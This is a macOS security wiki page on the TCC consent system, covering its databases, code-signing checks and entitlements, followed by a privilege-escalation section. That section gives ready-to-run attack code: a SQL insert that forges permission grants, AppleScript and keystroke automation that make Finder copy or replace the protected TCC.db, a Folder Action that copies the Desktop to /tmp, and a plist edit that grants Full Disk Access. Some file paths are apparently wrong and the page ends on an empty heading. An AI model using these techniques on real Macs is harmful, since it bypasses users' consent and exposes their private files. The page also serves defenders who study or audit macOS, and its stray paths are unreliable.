macOS TCC

## Basic Information

TCC (Transparency, Consent, and Control) is a security mechanism focused on regulating application permissions. Its primary role is to protect sensitive features such as location services, contacts, photos, microphone, camera, accessibility, and full disk access. By requiring explicit user consent before granting an app access to these resources, TCC improves privacy and the user's control over their data.

Users encounter TCC when applications request access to protected features. This is visible through a prompt that lets the user approve or deny the access. Furthermore, TCC accommodates direct user actions, such as dragging and dropping a file onto an application, to grant access to that specific file, ensuring applications only have access to what was explicitly permitted.

TCC is handled by the daemon located at /System/Library/PrivateFrameworks/TCC.framework/Support/tccd and configured in /System/Library/LaunchDaemons/com.apple.tccd.system.plist (registering the mach service com.apple.tccd.system).

There is also a user-mode tccd running for each logged-in user, defined in /System/Library/LaunchAgents/com.apple.tccd.plist and registering the mach services com.apple.tccd and com.apple.usernotifications.delegate.com.apple.tccd.

Here you can see tccd running as system and as user:

```bash
ps -ef | grep tcc
0   374     1   0 Thu07PM ??         2:01.66 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd system
501 63079     1   0  6:59PM ??         0:01.95 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd
```

Permissions are inherited from the parent application, and permissions are tracked based on the Bundle ID and the Developer ID.

## TCC Databases

The allow/deny decisions are then stored in several TCC databases:

  • The system-wide database in /Library/Application Support/com.apple.TCC/TCC.db.

    • This database is SIP protected, so only a SIP bypass can write into it.

  • The user TCC database $HOME/Library/Application Support/com.apple.TCC/TCC.db for per-user preferences.

    • This database is protected so that only processes with high TCC privileges, such as Full Disk Access, can write to it (but it isn't protected by SIP).

The previous databases are also TCC protected for read access. So you won't be able to read even your own user TCC database unless it's from a TCC privileged process.

However, remember that a process with these high privileges (like Full Disk Access or kTCCServiceEndpointSecurityClient) will be able to write the users' TCC databases.

  • There is a third TCC database in /var/db/locationd/clients.plist, indicating the clients allowed to access location services.

  • The SIP protected file /Users/carlospolop/Downloads/REG.db (also protected from read access by TCC) contains the location of all the valid TCC databases.

  • The SIP protected file /Users/carlospolop/Downloads/MDMOverrides.plist (also protected from read access by TCC) contains more TCC granted permissions.

  • The SIP protected file /Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist (but readable by anyone) is an allow list of applications that require a TCC exception.

The TCC database in iOS is located at /private/var/mobile/Library/TCC/TCC.db

The notification center UI can make changes in the system TCC database:

```bash
codesign -dv --entitlements :- /System/Library/PrivateFrameworks/TCC.framework/Support/tccd
[..]
com.apple.private.tcc.manager
com.apple.rootless.storage.TCC
```

However, users can delete or query rules using the tccutil command line tool.

### Querying the databases

User DB:

```bash
sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db
sqlite> .schema
# Tables: admin, policies, active_policy, access, access_overrides, expired, active_policy_id
# The table access contains the permissions per services
sqlite> select service, client, auth_value, auth_reason from access;
kTCCServiceLiverpool|com.apple.syncdefaultsd|2|4
kTCCServiceSystemPolicyDownloadsFolder|com.tinyspeck.slackmacgap|2|2
kTCCServiceMicrophone|us.zoom.xos|2|2
[...]

# Check user approved permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=2;
# Check user denied permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;
```

System DB:

```bash
sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db
sqlite> .schema
# Tables: admin, policies, active_policy, access, access_overrides, expired, active_policy_id
# The table access contains the permissions per services
sqlite> select service, client, auth_value, auth_reason from access;
kTCCServiceLiverpool|com.apple.syncdefaultsd|2|4
kTCCServiceSystemPolicyDownloadsFolder|com.tinyspeck.slackmacgap|2|2
kTCCServiceMicrophone|us.zoom.xos|2|2
[...]

# Get all FDA
sqlite> select service, client, auth_value, auth_reason from access where service = "kTCCServiceSystemPolicyAllFiles" and auth_value=2;

# Check user approved permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=2;
# Check user denied permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;
```
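As an added example (not part of the original page), the same queries expressed as a small Python audit: it decodes the numeric auth_value, auth_reason and client_type columns into the names this page lists for them and flags the allowed entries that amount to Full Disk Access or a route to it. It runs against a constructed in-memory copy of the access table with only the columns it reads; on a real host you would open one of the TCC.db paths above instead, from a process that TCC lets read it.

```python
"""Audit of a TCC.db 'access' table: decodes the numeric columns and flags
grants that are FDA or lead to FDA. Added example, not an Apple tool."""
import sqlite3

AUTH_VALUE = {0: "denied", 1: "unknown", 2: "allowed", 3: "limited"}
AUTH_REASON = {1: "Error", 2: "User Consent", 3: "User Set", 4: "System Set",
               5: "Service Policy", 6: "MDM Policy", 7: "Override Policy",
               8: "Missing usage string", 9: "Prompt Timeout",
               10: "Preflight Unknown", 11: "Entitled", 12: "App Type Policy"}
CLIENT_TYPE = {0: "bundle id", 1: "absolute path"}

# Services that, once allowed, are FDA or give a path to FDA-level access
HIGH_RISK = {
    "kTCCServiceSystemPolicyAllFiles": "Full Disk Access",
    "kTCCServiceEndpointSecurityClient": "equivalent to FDA",
    "kTCCServiceSystemPolicySysAdminFiles": "can change NFSHomeDirectory",
    "kTCCServiceAccessibility": "can drive Finder with keystrokes",
    "kTCCServicePostEvent": "can drive Finder with keystrokes",
}

def risk_for(service, indirect_object):
    """Why an allowed entry matters, or None for ordinary grants."""
    if service in HIGH_RISK:
        return HIGH_RISK[service]
    if service == "kTCCServiceAppleEvents" and indirect_object == "com.apple.Finder":
        return "Automation over Finder (Finder always has FDA)"
    return None

def audit_access(conn):
    """Return every allowed (auth_value=2) entry decoded, high-risk ones first."""
    rows = conn.execute(
        "SELECT service, client, client_type, auth_value, auth_reason, "
        "indirect_object_identifier FROM access WHERE auth_value = 2 "
        "ORDER BY rowid").fetchall()
    findings = [{
        "service": service,
        "client": client,
        "client_type": CLIENT_TYPE.get(ctype, str(ctype)),
        "auth_value": AUTH_VALUE.get(value, str(value)),
        "auth_reason": AUTH_REASON.get(reason, str(reason)),
        "indirect_object": indirect,
        "risk": risk_for(service, indirect),
    } for service, client, ctype, value, reason, indirect in rows]
    findings.sort(key=lambda f: f["risk"] is None)   # stable sort: risky entries first
    return findings

def sample_db():
    """Constructed stand-in for TCC.db with only the columns the audit reads."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER,"
                 " auth_value INTEGER, auth_reason INTEGER,"
                 " indirect_object_identifier TEXT DEFAULT 'UNUSED')")
    conn.executemany("INSERT INTO access VALUES (?, ?, ?, ?, ?, ?)", [
        ("kTCCServiceMicrophone", "us.zoom.xos", 0, 2, 2, "UNUSED"),
        ("kTCCServiceSystemPolicyDownloadsFolder", "com.tinyspeck.slackmacgap", 0, 2, 2, "UNUSED"),
        ("kTCCServiceAppleEvents", "com.googlecode.iterm2", 0, 2, 2, "com.apple.Finder"),
        ("kTCCServiceSystemPolicyAllFiles", "/usr/local/bin/backup-agent", 1, 2, 3, "UNUSED"),
        ("kTCCServiceCamera", "ru.keepcoder.Telegram", 0, 0, 2, "UNUSED"),  # denied entry
    ])
    return conn

if __name__ == "__main__":
    # Real host: sqlite3.connect(os.path.expanduser("~/Library/Application Support/com.apple.TCC/TCC.db"))
    for finding in audit_access(sample_db()):
        print(finding)
```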

Checking both databases you can see the permissions an app has been allowed, has been denied, or doesn't have yet (it will be prompted for them).

  • service is the string representation of the TCC permission

  • client is the bundle ID or the path to the binary that holds the permission

  • client_type indicates whether it is a Bundle Identifier (0) or an absolute path (1)

How to execute it if it's an absolute path

Just run launchctl load your_bin.plist, with a plist like this:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <!-- Label for the job -->
    <key>Label</key>
    <string>com.example.yourbinary</string>

    <!-- The path to the executable -->
    <key>Program</key>
    <string>/path/to/binary</string>

    <!-- Arguments to pass to the executable (if any) -->
    <key>ProgramArguments</key>
    <array>
        <string>arg1</string>
        <string>arg2</string>
    </array>

    <!-- Run at load -->
    <key>RunAtLoad</key>
    <true/>

    <!-- Keep the job alive, restart if necessary -->
    <key>KeepAlive</key>
    <true/>

    <!-- Standard output and error paths (optional) -->
    <key>StandardOutPath</key>
    <string>/tmp/YourBinary.stdout</string>
    <key>StandardErrorPath</key>
    <string>/tmp/YourBinary.stderr</string>
</dict>
</plist>
```

  • auth_value can have different values: denied (0), unknown (1), allowed (2), or limited (3).

  • auth_reason can take the following values: Error (1), User Consent (2), User Set (3), System Set (4), Service Policy (5), MDM Policy (6), Override Policy (7), Missing usage string (8), Prompt Timeout (9), Preflight Unknown (10), Entitled (11), App Type Policy (12)

  • The csreq field is there to indicate how to verify the binary to execute before granting it the TCC permissions:

```bash
# Query to get csreq in printable hex
select service, client, hex(csreq) from access where auth_value=2;

# To decode it (https://stackoverflow.com/questions/52706542/how-to-get-csreq-of-macos-application-on-command-line):
BLOB="FADE0C000000003000000001000000060000000200000012636F6D2E6170706C652E5465726D696E616C000000000003"
echo "$BLOB" | xxd -r -p > terminal-csreq.bin
csreq -r- -t < terminal-csreq.bin

# To create a new one (https://stackoverflow.com/questions/52706542/how-to-get-csreq-of-macos-application-on-command-line):
REQ_STR=$(codesign -d -r- /Applications/Utilities/Terminal.app/ 2>&1 | awk -F ' => ' '/designated/{print $2}')
echo "$REQ_STR" | csreq -r- -b /tmp/csreq.bin
REQ_HEX=$(xxd -p /tmp/csreq.bin  | tr -d '\n')
echo "X'$REQ_HEX'"
```
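The csreq column is the binary Code Signing Requirement that tccd checks against the requesting process before honouring an entry. As an added example (not code from the original page or from Apple), this Python decoder turns such a blob back into the text form that csreq prints; it covers the opcodes seen in typical TCC rows and is fed the Terminal and Telegram blobs quoted on this page.

```python
"""Decode a TCC csreq blob into the text `csreq -r- -t` prints. Added example, not an Apple tool;
opcodes follow Apple's requirement.h and only those seen in typical TCC rows are handled."""
import struct

MAGIC = 0xFADE0C00                                   # requirement blob magic
OP_IDENT, OP_APPLE_ANCHOR, OP_AND, OP_OR = 2, 3, 6, 7
OP_CERT_FIELD, OP_CERT_GENERIC, OP_APPLE_GENERIC_ANCHOR = 11, 14, 15
ANCHORS = {OP_APPLE_ANCHOR: "anchor apple", OP_APPLE_GENERIC_ANCHOR: "anchor apple generic"}

class Reader:
    def __init__(self, data):
        self.data, self.pos = data, 0
    def u32(self):
        self.pos += 4
        return struct.unpack_from(">I", self.data, self.pos - 4)[0]
    def item(self):                                  # length-prefixed bytes, padded to 4
        n, start = self.u32(), self.pos
        self.pos += (n + 3) & ~3
        return self.data[start:start + n]

def decode_oid(raw):                                 # DER OID bytes -> "1.2.840.113635.100.6.1.9"
    arcs, val = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs, val = arcs + [val], 0
    return ".".join(map(str, arcs))

def match_suffix(r):
    op = r.u32()                                     # 0 = matchExists, 1 = matchEqual
    if op == 1:
        return ' = "%s"' % r.item().decode()
    if op != 0:
        raise ValueError("unsupported match operator %d" % op)
    return " /* exists */"

def expr(r):
    op = r.u32() & 0x00FFFFFF                        # top byte carries flags; returns (text, opcode)
    if op == OP_IDENT:
        return 'identifier "%s"' % r.item().decode(), op
    if op in ANCHORS:
        return ANCHORS[op], op
    if op in (OP_AND, OP_OR):
        (lt, lop), (rt, rop) = expr(r), expr(r)
        if op == OP_AND:                             # an 'or' under an 'and' needs parentheses
            lt, rt = ["(%s)" % t if o == OP_OR else t for t, o in ((lt, lop), (rt, rop))]
        return "%s %s %s" % (lt, "and" if op == OP_AND else "or", rt), op
    if op in (OP_CERT_FIELD, OP_CERT_GENERIC):
        slot, raw = r.u32(), r.item()                # slot 0 = leaf, -1 = anchor, n = intermediate
        field = "field." + decode_oid(raw) if op == OP_CERT_GENERIC else raw.decode()
        where = {0: "leaf", 0xFFFFFFFF: "anchor"}.get(slot, str(slot))
        return "certificate %s[%s]%s" % (where, field, match_suffix(r)), op
    raise ValueError("unsupported opcode %d" % op)

def decode_csreq(blob):
    r = Reader(blob)
    if r.u32() != MAGIC or r.u32() != len(blob) or r.u32() != 1:   # kind 1 = expression form
        raise ValueError("not a single-requirement blob")
    return expr(r)[0]

# The two csreq values quoted on this page (Terminal, Telegram) as printed by hex(csreq)
TERMINAL_HEX = "FADE0C000000003000000001000000060000000200000012636F6D2E6170706C652E5465726D696E616C000000000003"
TELEGRAM_HEX = ("FADE0C00" "000000CC" "00000001" "00000006" "00000007" "00000006" "0000000F" "0000000E" "00000000" "0000000A" "2A864886F76364060109" "0000"
                "00000000" "00000006" "00000006" "00000006" "0000000F" "0000000E" "00000001" "0000000A" "2A864886F76364060206" "0000"
                "00000000" "0000000E" "00000000" "0000000A" "2A864886F7636406010D" "0000" "00000000" "0000000B" "00000000" "0000000A" "7375626A6563742E4F55" "0000"
                "00000001" "0000000A" "364E3338565753354258" "0000" "00000002" "00000015" "72752E6B656570636F6465722E54656C656772616D" "000000")

if __name__ == "__main__":
    for h in (TERMINAL_HEX, TELEGRAM_HEX):
        print(decode_csreq(bytes.fromhex(h)))
```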

You can also check the permissions already given to apps in System Preferences --> Security & Privacy --> Privacy --> Files and Folders.

Users can delete or query rules using tccutil.

### Reset TCC permissions

```bash
# You can reset all the permissions given to an application with
tccutil reset All app.some.id

# Reset the permissions granted to all apps
tccutil reset All
```

### TCC Signature Checks

The TCC database stores the Bundle ID of the application, but it also stores information about the signature to make sure the app asking to use a permission is the correct one.

```bash
# From sqlite
sqlite> select service, client, hex(csreq) from access where auth_value=2;
# Get csreq

# From bash
echo FADE0C00000000CC000000010000000600000007000000060000000F0000000E000000000000000A2A864886F763640601090000000000000000000600000006000000060000000F0000000E000000010000000A2A864886F7636406020600000000000000000E000000000000000A2A864886F7636406010D0000000000000000000B000000000000000A7375626A6563742E4F550000000000010000000A364E33385657533542580000000000020000001572752E6B656570636F6465722E54656C656772616D000000 | xxd -r -p - > /tmp/telegram_csreq.bin
## Get signature checks
csreq -t -r /tmp/telegram_csreq.bin
(anchor apple generic and certificate leaf[field.1.2.840.113635.100.6.1.9] /* exists */ or anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = "6N38VWS5BX") and identifier "ru.keepcoder.Telegram"
```

Therefore, other applications using the same name and bundle ID won't be able to use the permissions granted to another app.

### Entitlements & TCC Permissions

Apps don't only need to request and be granted access to some resources, they also need to hold the relevant entitlements. For example, Telegram has the entitlement com.apple.security.device.camera to request access to the camera. An app that doesn't have this entitlement won't be able to access the camera (and the user won't even be asked for permission).

However, for apps to access certain user folders, such as ~/Desktop, ~/Downloads and ~/Documents, they don't need any specific entitlement. The system handles the access transparently and prompts the user as needed.

Apple's own apps won't generate prompts. They carry pre-granted rights in their entitlements list, meaning they will never generate a popup, nor will they appear in any of the TCC databases. For example:

```bash
codesign -dv --entitlements :- /System/Applications/Calendar.app
[...]
<key>com.apple.private.tcc.allow</key>
<array>
    <string>kTCCServiceReminders</string>
    <string>kTCCServiceCalendar</string>
    <string>kTCCServiceAddressBook</string>
</array>
```

This prevents Calendar from asking the user for access to reminders, the calendar and the address book.

Apart from some official documentation about entitlements, it's also possible to find unofficial interesting information about entitlements at https://newosxbook.com/ent.jl

Some TCC permissions are: kTCCServiceAppleEvents, kTCCServiceCalendar, kTCCServicePhotos... There is no public list that defines all of them, but you can check this list of known ones.

### Sensitive unprotected places

  • $HOME (itself)

  • $HOME/.ssh, $HOME/.aws, etc.

  • /tmp

### User Intent / com.apple.macl

As mentioned previously, it's possible to grant an app access to a file by drag & dropping it onto the app. This access isn't recorded in any TCC database but as an extended attribute of the file. This attribute stores the UUID of the allowed app:

```bash
xattr Desktop/private.txt
com.apple.macl

# Check extra access to the file
## Script from https://gist.githubusercontent.com/brunerd/8bbf9ba66b2a7787e1a6658816f3ad3b/raw/34cabe2751fb487dc7c3de544d1eb4be04701ac5/maclTrack.command
macl_read Desktop/private.txt
Filename,Header,App UUID
"Desktop/private.txt",0300,769FD8F1-90E0-3206-808C-A8947BEBD6C3

# Get the UUID of the app
otool -l /System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal| grep uuid
uuid 769FD8F1-90E0-3206-808C-A8947BEBD6C3
```

It's curious that the com.apple.macl attribute is managed by the Sandbox, not by tccd.

Also note that if you move a file that allows the UUID of an app on your computer to a different computer, the same app will have different UIDs there, so the file won't grant access to that app.

The extended attribute com.apple.macl can't be cleared like other extended attributes because it's protected by SIP. However, as explained in this post, it's possible to get rid of it by zipping the file, deleting the original and unzipping it.

## TCC Privesc & Bypasses

### Insert into TCC

If at some point you manage to get write access over a TCC database, you can use something like the following to add an entry (remove the comments):

Insert into TCC example

```sql
INSERT INTO access (
    service, client, client_type, auth_value, auth_reason, auth_version, csreq,
    policy_id, indirect_object_identifier_type, indirect_object_identifier,
    indirect_object_code_identity, flags, last_modified, pid, pid_version,
    boot_uuid, last_reminded
) VALUES (
    'kTCCServiceSystemPolicyDesktopFolder', -- service
    'com.googlecode.iterm2',                -- client
    0, -- client_type (0 - bundle id)
    2, -- auth_value (2 - allowed)
    3, -- auth_reason (3 - "User Set")
    1, -- auth_version (always 1)
    X'FADE0C00000000C40000000100000006000000060000000F0000000200000015636F6D2E676F6F676C65636F64652E697465726D32000000000000070000000E000000000000000A2A864886F7636406010900000000000000000006000000060000000E000000010000000A2A864886F763640602060000000000000000000E000000000000000A2A864886F7636406010D0000000000000000000B000000000000000A7375626A6563742E4F550000000000010000000A483756375859565137440000', -- csreq is a BLOB, set to NULL for now
    NULL, -- policy_id
    NULL, -- indirect_object_identifier_type
    'UNUSED', -- indirect_object_identifier - default value
    NULL, -- indirect_object_code_identity
    0, -- flags
    strftime('%s', 'now'), -- last_modified with default current timestamp
    NULL, -- assuming pid is an integer and optional
    NULL, -- assuming pid_version is an integer and optional
    'UNUSED', -- default value for boot_uuid
    strftime('%s', 'now') -- last_reminded with default current timestamp
);
```

### TCC Payloads

If you managed to get inside an app with some TCC permissions, check the following page with TCC payloads to abuse them:

macOS TCC Payloads

### Apple Events

Learn about Apple Events in:

macOS Apple Events

### Automation (Finder) to FDA*

The TCC name of the Automation permission is kTCCServiceAppleEvents. This TCC entry also records, inside the TCC database, the specific application that may be controlled (so the permission doesn't simply allow controlling everything).

Finder is an application that always has FDA (even if it doesn't appear in the UI), so if you have Automation privileges over it, you can abuse its privileges to make it perform some actions. In this case your app would need the permission kTCCServiceAppleEvents over com.apple.Finder.

```bash
# This AppleScript will copy the user TCC database into /tmp
osascript<<EOD
tell application "Finder"
    set homeFolder to path to home folder as string
    set sourceFile to (homeFolder & "Library:Application Support:com.apple.TCC:TCC.db") as alias
    set targetFolder to POSIX file "/tmp" as alias
    duplicate file sourceFile to targetFolder with replacing
end tell
EOD
```

You could abuse this to write your own user TCC database.

With this permission you will be able to ask Finder to access TCC restricted folders and hand you the files, but as far as I know you won't be able to make Finder execute arbitrary code to fully abuse its FDA access.

Therefore, you won't be able to abuse the full FDA capabilities.

This is the TCC prompt to get Automation privileges over Finder:

Please note that because the Automator app has the TCC permission kTCCServiceAppleEvents, it can control any app, like Finder. So with permission to control Automator you could also control Finder, with code like the following:

Get a shell inside Automator

```applescript
osascript <<EOD
-- theScript is the shell command the Run Shell Script action will execute;
-- the value is a placeholder, the original page does not define it
set theScript to "echo placeholder"

tell application "Automator"
    set actionID to Automator action id "com.apple.RunShellScript"
    tell (make new workflow)
        add actionID to it
        tell last Automator action
            set value of setting "inputMethod" to 1
            set value of setting "COMMAND_STRING" to theScript
        end tell
        execute it
    end tell
    activate
end tell
EOD
```

Once inside the shell you can use the previous code to make Finder copy the TCC databases, for example, and no TCC prompt will appear.

The same happens with the **Script Editor app**: it can control Finder, but using AppleScript you cannot force it to execute a script.

### Automation (SE) to some TCC

**System Events can create Folder Actions, and Folder Actions can access some TCC folders** (Desktop, Documents & Downloads), so a script like the following one can be used to abuse this behaviour:
```bash
# Create script to execute with the action
cat > "/tmp/script.js" <<EOD
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("cp -r $HOME/Desktop /tmp/desktop");
EOD

osacompile -l JavaScript -o "$HOME/Library/Scripts/Folder Action Scripts/script.scpt" "/tmp/script.js"

# Create folder action with System Events in "$HOME/Desktop"
osascript <<EOD
tell application "System Events"
-- Ensure Folder Actions are enabled
set folder actions enabled to true

-- Define the path to the folder and the script
set homeFolder to path to home folder as text
set folderPath to homeFolder & "Desktop"
set scriptPath to homeFolder & "Library:Scripts:Folder Action Scripts:script.scpt"

-- Create or get the Folder Action for the Desktop
if not (exists folder action folderPath) then
make new folder action at end of folder actions with properties {name:folderPath, path:folderPath}
end if
set myFolderAction to folder action folderPath

-- Attach the script to the Folder Action
if not (exists script scriptPath of myFolderAction) then
make new script at end of scripts of myFolderAction with properties {name:scriptPath, path:scriptPath}
end if

-- Enable the Folder Action and the script
enable myFolderAction
end tell
EOD

# File operations in the folder should trigger the Folder Action
touch "$HOME/Desktop/file"
rm "$HOME/Desktop/file"
```

### Automation (SE) + Accessibility (kTCCServicePostEvent|kTCCServiceAccessibility) to FDA*

Automation over System Events + Accessibility (kTCCServicePostEvent) allows sending keystrokes to processes. This way you could abuse Finder to replace the user's TCC.db or to give FDA to an arbitrary app (although a password might be prompted for this).

Example of Finder replacing the user's TCC.db:

```bash
# store the TCC.db file to copy in /tmp
osascript <<EOF
tell application "System Events"
    -- Open Finder
    tell application "Finder" to activate

    -- Open the /tmp directory
    keystroke "g" using {command down, shift down}
    delay 1
    keystroke "/tmp"
    delay 1
    keystroke return
    delay 1

    -- Select and copy the file
    keystroke "TCC.db"
    delay 1
    keystroke "c" using {command down}
    delay 1

    -- Resolve $HOME environment variable
    set homePath to system attribute "HOME"

    -- Navigate to the TCC directory under $HOME
    keystroke "g" using {command down, shift down}
    delay 1
    keystroke homePath & "/Library/Application Support/com.apple.TCC"
    delay 1
    keystroke return
    delay 1

    -- Check if the file exists in the destination and delete it if it does (need to send a key code: https://macbiblioblog.blogspot.com/2014/12/key-codes-for-function-and-special-keys.html)
    keystroke "TCC.db"
    delay 1
    keystroke return
    delay 1
    key code 51 using {command down}
    delay 1

    -- Paste the file
    keystroke "v" using {command down}
end tell
EOF
```

### kTCCServiceAccessibility to FDA*

Check this page for some payloads that abuse the Accessibility permission to privesc to FDA* or to run a keylogger, for example.

### Endpoint Security Client to FDA

If you have kTCCServiceEndpointSecurityClient, you have FDA. End of story.

### System Policy SysAdmin File to FDA

kTCCServiceSystemPolicySysAdminFiles allows changing the NFSHomeDirectory attribute of a user, which changes their home folder and therefore allows bypassing TCC.

### User TCC DB to FDA

Even with write permissions over the user TCC database you can't grant yourself FDA: only the entry living in the system database can grant that.

But you can give yourself Automation rights over Finder, and abuse the previous technique to escalate to FDA*.

### FDA to TCC permissions

The TCC name of Full Disk Access is kTCCServiceSystemPolicyAllFiles

I don't see this as a real privesc, but just in case you find it useful: if you control a program with FDA you can modify the user's TCC database and give yourself any access. This might be useful as a persistence technique in case you could lose your FDA permissions.

### SIP Bypass to TCC Bypass

The system TCC database is protected by SIP, which is why only processes with the indicated entitlements are able to modify it. Therefore, if an attacker finds a SIP bypass over a file (being able to modify a file restricted by SIP), they will be able to:

  • Remove the protection of a TCC database and grant themselves all TCC permissions. They could abuse any of these files, for example:

    • The system TCC databases

    • REG.db

    • MDMOverrides.plist

However, there is another option to turn this SIP bypass into a TCC bypass: the file /Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist is an allow list of applications that require a TCC exception. Therefore, if an attacker can remove the SIP protection from this file and add their own application, that application will be able to bypass TCC. For example, adding Terminal:

```bash
# Get needed info
codesign -d -r- /System/Applications/Utilities/Terminal.app
```

AllowApplicationsList.plist file:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Services</key>
    <dict>
        <key>SystemPolicyAllFiles</key>
        <array>
            <dict>
                <key>CodeRequirement</key>
                <string>identifier &quot;com.apple.Terminal&quot; and anchor apple</string>
                <key>IdentifierType</key>
                <string>bundleID</string>
                <key>Identifier</key>
                <string>com.apple.Terminal</string>
            </dict>
        </array>
    </dict>
</dict>
</plist>
```

## TCC Bypasses
